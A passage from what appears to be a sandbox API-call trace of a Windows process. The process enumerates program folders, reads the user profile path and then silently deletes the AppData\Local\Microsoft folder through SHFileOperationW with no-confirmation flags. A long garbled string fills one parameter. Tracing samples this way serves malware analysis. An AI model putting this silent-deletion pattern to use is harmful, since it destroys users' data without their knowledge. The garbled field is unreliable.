lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbee6232d, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xbee6232d, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xbee6232d, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Visio", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9fa64c01, ftLastAccessTime.dwHighDateTime=0x1d336de, ftLastWriteTime.dwLowDateTime=0x9fa64c01, ftLastWriteTime.dwHighDateTime=0x1d336de, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows", cAlternateFileName="")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd3e54fc1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc88b17c4, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd3e54fc1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows Live", cAlternateFileName="WINDOW~3")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x306b22ce, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x306b22ce, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~2")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc88fb23e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WindowsApps", cAlternateFileName="WINDOW~1")) returned 1 [0168.925] FindNextFileW (in: hFindFile=0x9e1fb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xc88fb23e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="WindowsApps", cAlternateFileName="WINDOW~1")) returned 0 [0168.925] FindClose (in: hFindFile=0x9e1fb8 | out: hFindFile=0x9e1fb8) returned 1 [0168.925] GetLastError () returned 0x12 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.926] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0168.926] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa690 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0168.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0168.926] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0168.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0168.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0168.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0168.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb420 [0168.928] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/Microsoft", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", lpFilePart=0x8cf650*="Microsoft") returned 0x27 [0168.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb420 | out: hHeap=0x2af0000) returned 1 [0168.928] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\microsoft")) returned 0x10 [0168.928] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 32 [0173.059] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0173.059] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0173.059] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0173.059] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0173.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0173.986] HeapFree (in: hHeap=0x2af0000, 